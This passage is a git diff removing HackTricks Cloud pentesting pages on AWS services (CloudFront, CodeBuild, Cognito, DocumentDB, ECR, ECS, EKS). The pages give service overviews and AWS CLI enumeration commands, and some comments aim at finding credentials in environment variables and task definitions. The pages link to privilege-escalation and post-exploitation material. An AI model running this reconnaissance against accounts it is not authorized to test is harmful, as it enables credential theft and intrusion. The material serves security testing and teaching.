-{% endhint %} - -## CloudFront - -CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. - -The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. - -**By default cookie logging is disabled** but you can enable it. - -### Functions - -You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS). - -As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. - -### Enumeration - -```bash -aws cloudfront list-distributions -aws cloudfront get-distribution --id # Just get 1 -aws cloudfront get-distribution-config --id - -aws cloudfront list-functions -aws cloudfront get-function --name TestFunction function_code.js - -aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" -``` - -## Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md" %} -[aws-cloudfront-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-cloudfront-post-exploitation.md" %} -[aws-cloudfront-post-exploitation.md](../aws-post-exploitation/aws-cloudfront-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md deleted file mode 100644 index 7798cea35..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md +++ /dev/null @@ -1,102 +0,0 @@ -# AWS - Codebuild Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CodeBuild - -AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass: - -1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. -2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. -3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. - -AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. - -### **Github/Gitlab/Bitbucket Credentials** - -#### **Default source credentials** - -This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials. - -The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs. - -#### Custom source credential - -Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**. - -This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. - -### Enumeration - -```bash -# List external repo creds (such as github tokens) -## It doesn't return the token but just the ARN where it's located -aws codebuild list-source-credentials - -# Projects -aws codebuild list-shared-projects -aws codebuild list-projects -aws codebuild batch-get-projects --names # Check for creds in env vars - -# Builds -aws codebuild list-builds -aws codebuild list-builds-for-project --project-name -aws codebuild list-build-batches -aws codebuild list-build-batches-for-project --project-name - -# Reports -aws codebuild list-reports -aws codebuild describe-test-cases --report-arn -``` - -### Privesc - -In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-codebuild-privesc.md" %} -[aws-codebuild-privesc.md](../aws-privilege-escalation/aws-codebuild-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-codebuild-post-exploitation/" %} -[aws-codebuild-post-exploitation](../aws-post-exploitation/aws-codebuild-post-exploitation/) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md" %} -[aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md deleted file mode 100644 index 1701910c0..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md +++ /dev/null @@ -1,130 +0,0 @@ -# AWS - Cognito Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cognito - -Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. - -Central to Amazon Cognito are two primary components: - -1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. -2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. - -### **User pools** - -To learn what is a **Cognito User Pool check**: - -{% content-ref url="cognito-user-pools.md" %} -[cognito-user-pools.md](cognito-user-pools.md) -{% endcontent-ref %} - -### **Identity pools** - -The learn what is a **Cognito Identity Pool check**: - -{% content-ref url="cognito-identity-pools.md" %} -[cognito-identity-pools.md](cognito-identity-pools.md) -{% endcontent-ref %} - -## Enumeration - -{% code overflow="wrap" %} -```bash -# List Identity Pools -aws cognito-identity list-identity-pools --max-results 60 -aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" -aws cognito-identity list-identities --identity-pool-id --max-results 60 -aws cognito-identity get-identity-pool-roles --identity-pool-id - -# Identities Datasets -## Get dataset of identity id (inside identity pool) -aws cognito-sync list-datasets --identity-pool-id --identity-id -## Get info of the dataset -aws cognito-sync describe-dataset --identity-pool-id --identity-id --dataset-name -## Get dataset records -aws cognito-sync list-records --identity-pool-id --identity-id --dataset-name - -# User Pools -## Get pools -aws cognito-idp list-user-pools --max-results 60 - -## Get users -aws cognito-idp list-users --user-pool-id - -## Get groups -aws cognito-idp list-groups --user-pool-id - -## Get users in a group -aws cognito-idp list-users-in-group --user-pool-id --group-name - -## List App IDs of a user pool -aws cognito-idp list-user-pool-clients --user-pool-id - -## List configured identity providers for a user pool -aws cognito-idp list-identity-providers --user-pool-id - -## List user import jobs -aws cognito-idp list-user-import-jobs --user-pool-id --max-results 60 - -## Get MFA config of a user pool -aws cognito-idp get-user-pool-mfa-config --user-pool-id - -## Get risk configuration -aws cognito-idp describe-risk-configuration --user-pool-id -``` -{% endcode %} - -### Identity Pools - Unauthenticated Enumeration - -Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). - -### User Pools - Unauthenticated Enumeration - -Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.** - -## Privesc - -{% content-ref url="../../aws-privilege-escalation/aws-cognito-privesc.md" %} -[aws-cognito-privesc.md](../../aws-privilege-escalation/aws-cognito-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md" %} -[aws-cognito-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) -{% endcontent-ref %} - -## Persistence - -{% content-ref url="../../aws-persistence/aws-cognito-persistence.md" %} -[aws-cognito-persistence.md](../../aws-persistence/aws-cognito-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md deleted file mode 100644 index b19805d71..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md +++ /dev/null @@ -1,66 +0,0 @@ -# AWS - DocumentDB Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## DocumentDB - -Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. - -### Enumeration - -```bash -aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" -aws docdb describe-db-instances #Get hostnames from here - -# Parameter groups -aws docdb describe-db-cluster-parameter-groups -aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name - -# Snapshots -aws docdb describe-db-cluster-snapshots -aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier -``` - -### NoSQL Injection - -As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %} - -### DocumentDB - -{% content-ref url="../aws-unauthenticated-enum-access/aws-documentdb-enum.md" %} -[aws-documentdb-enum.md](../aws-unauthenticated-enum-access/aws-documentdb-enum.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md deleted file mode 100644 index f33f7488f..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ /dev/null @@ -1,131 +0,0 @@ -# AWS - ECR Enum - -## AWS - ECR Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### ECR - -#### Basic Information - -Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. - -ECR is compose by 2 types of objects: **Registries** and **Repositories**. - -**Registries** - -Every AWS account has 2 registries: **Private** & **Public**. - -1. **Private Registries**: - -* **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. - * The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` -* **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. -* **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... -* **Other private registry options**: - * The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. - * The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. - * The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. - * Specific **IAM policies** can be configured to grant different **permissions**. - * The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. - -2. **Public Registries**: - -* **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** - * The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. - -**Repositories** - -These are the **images** that in the **private registry** or to the **public** one. - -{% hint style="info" %} -Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. -{% endhint %} - -#### Registry & Repository Policies - -**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: - -
- -#### Enumeration - -{% code overflow="wrap" %} -```bash -# Get repos -aws ecr describe-repositories -aws ecr describe-registry - -# Get image metadata -aws ecr list-images --repository-name -aws ecr describe-images --repository-name -aws ecr describe-image-replication-status --repository-name --image-id -aws ecr describe-image-scan-findings --repository-name --image-id -aws ecr describe-pull-through-cache-rules --repository-name --image-id - -# Get public repositories -aws ecr-public describe-repositories - -# Get policies -aws ecr get-registry-policy -aws ecr get-repository-policy --repository-name -``` -{% endcode %} - -#### Unauthenticated Enum - -{% content-ref url="../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md" %} -[aws-ecr-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privesc - -In the following page you can check how to **abuse ECR permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-ecr-privesc.md" %} -[aws-ecr-privesc.md](../aws-privilege-escalation/aws-ecr-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} -[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-ecr-persistence.md" %} -[aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md deleted file mode 100644 index 198b4e856..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md +++ /dev/null @@ -1,108 +0,0 @@ -# AWS - ECS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECS - -### Basic Information - -Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. - -ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. - -* **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. -* **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. - * There **2 types of applications**: - * **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. - * **Task**: A standalone task that runs and terminates. For example, a batch job. - * Among the service applications, there are **2 types of service schedulers**: - * [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. - * [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. -* **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... - * Check **env variables for sensitive info**! - -### Sensitive Data In Task Definitions - -Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. - -Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. - -### Enumeration - -```bash -# Clusters info -aws ecs list-clusters -aws ecs describe-clusters --clusters - -# Container instances -## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster. -aws ecs list-container-instances --cluster -aws ecs describe-container-instances --cluster --container-instances - -# Services info -aws ecs list-services --cluster -aws ecs describe-services --cluster --services -aws ecs describe-task-sets --cluster --service - -# Task definitions -aws ecs list-task-definition-families -aws ecs list-task-definitions -aws ecs list-tasks --cluster -aws ecs describe-tasks --cluster --tasks -## Look for env vars and secrets used from the task definition -aws ecs describe-task-definition --task-definition : -``` - -### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md" %} -[aws-ecs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) -{% endcontent-ref %} - -### Privesc - -In the following page you can check how to **abuse ECS permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-ecs-privesc.md" %} -[aws-ecs-privesc.md](../aws-privilege-escalation/aws-ecs-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-ecs-post-exploitation.md" %} -[aws-ecs-post-exploitation.md](../aws-post-exploitation/aws-ecs-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-ecs-persistence.md" %} -[aws-ecs-persistence.md](../aws-persistence/aws-ecs-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md deleted file mode 100644 index b99caa683..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ /dev/null @@ -1,72 +0,0 @@ -# AWS - EKS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EKS - -Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. - -Key aspects of Amazon EKS include: - -1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. -2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. -3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. -4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. - -#### Enumeration - -```bash -aws eks list-clusters -aws eks describe-cluster --name -# Check for endpointPublicAccess and publicAccessCidrs - -aws eks list-fargate-profiles --cluster-name -aws eks describe-fargate-profile --cluster-name --fargate-profile-name - -aws eks list-identity-provider-configs --cluster-name -aws eks describe-identity-provider-config --cluster-name --identity-provider-config - -aws eks list-nodegroups --cluster-name -aws eks describe-nodegroup --cluster-name --nodegroup-name - -aws eks list-updates --name -aws eks describe-update --name --update-id -``` - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-eks-post-exploitation.md" %} -[aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md deleted file mode 100644 index 8839a6598..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - ElastiCache - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
